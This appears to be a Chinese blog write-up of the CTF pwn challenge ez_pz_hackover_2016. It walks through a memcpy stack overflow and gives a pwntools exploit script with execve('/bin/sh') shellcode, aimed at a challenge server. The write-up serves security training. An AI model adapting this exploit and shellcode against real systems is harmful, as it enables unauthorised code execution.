ctf【ez_pz_hackover_2016】

最新推荐文章于 2023-11-07 23:06:56 发布
最新推荐文章于 2023-11-07 23:06:56 发布
阅读量160 收藏
点赞数
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangliang_/article/details/127585363
版权

逆向

int chall()
{
  size_t v0; // eax
  int result; // eax
  char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
  _BYTE *v3; // [esp+40Ch] [ebp-Ch]

  printf("Yippie, lets crash: %p\n", s);
  printf("Whats your name?\n");
  printf("> ");
  fgets(s, 1023, stdin);
  v0 = strlen(s);
  v3 = memchr(s, 10, v0);
  if ( v3 )
    *v3 = 0;
  printf("\nWelcome %s!\n", s);
  result = strcmp(s, "crashme");
  if ( !result )
    result = vuln((char)s, 0x400u);
  return result;
}

void *__cdecl vuln(char src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);
}

攻击思路

memcpy中将src中的数据拷贝到dest中,但dest的最大存储空间为50字节

-00000032 dest            db 50 dup(?)
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 src             db 4 dup(?)
+0000000C n               dd ?

偏移量为32字节,由于在执行vuln函数之前会判断s与"crashme",因此首部需输入"crashme\0x00",还需加入26-8字节=18字节

脚本攻击

from pwn import *

p=remote('node4.buuoj.cn',28099)
p.recvuntil(b'crash: ')
addr=int(p.recv(10),16)   #转换地址进制
shellcode = b"\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"

payload=b"crashme\x00"+b"a"*18+p32(addr-0x1c)+shellcode

p.sendline(payload)
p.interactive()

ACanary
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
3S软件
Zzzpiu的博客
12-29 429
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
ez_pz_hackover_2016
m0sway的博客
11-23 463
ez_pz_hackover_2016 使用checksec查看: 开启了完全RELRO,使整个 GOT 只读,放进IDA中查看: header()函数是初始化函数,没用,主要程序流程在chall()中,直接看chall()函数: 首先程序会printf变量s在栈上的地址 然后接受用户输入0x3ff个字符 接着用strcmp()函数将用户输入的字符串和ceashme做对比,如果不同,退出程序。 如果相同,进入vuln()函数,我们跟进去查看: 很明显,一个栈溢出。 本题中并没有system函数以及/
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
m0_55368674的博客
01-19 306
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
ez_pz_hackover_2016 wp (python3)
Kata_Jhin的博客
10-08 139
ez_pz_hackover_2016 wp (python3)
memcpy
weixin_45959515的博客
08-26 137
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
buuctf ez_pz_hackover_2016
qq_73625550的博客
05-26 192
使用gdb调试来计算偏移,ret2shecllcode,栈溢出
【pwn】ez_pz_hackover_2016 --pwngdb和pwntools的结合,动态调试
question55的博客
11-07 71
该函数的作用是将src指向的内存区域中的前n个字节的数据复制到dest指向的内存区域中。由于该函数返回void*类型,通常在使用时需要将其转换为目标类型的指针。memcpy函数是C/C++语言中常用的内存拷贝函数,用于将一块内存中的数据复制到另一块内存中。dest 是目标内存区域的指针,即要将数据复制到的位置。src 是源内存区域的指针,即要从哪里复制数据。n 是要复制的字节数。
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 399
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
BUUCTF pwn——ez_pz_hackover_2016
CNS-Enterprise BCC-1701-J
04-28 130
BUUCTF 做题练习
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ACanary

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值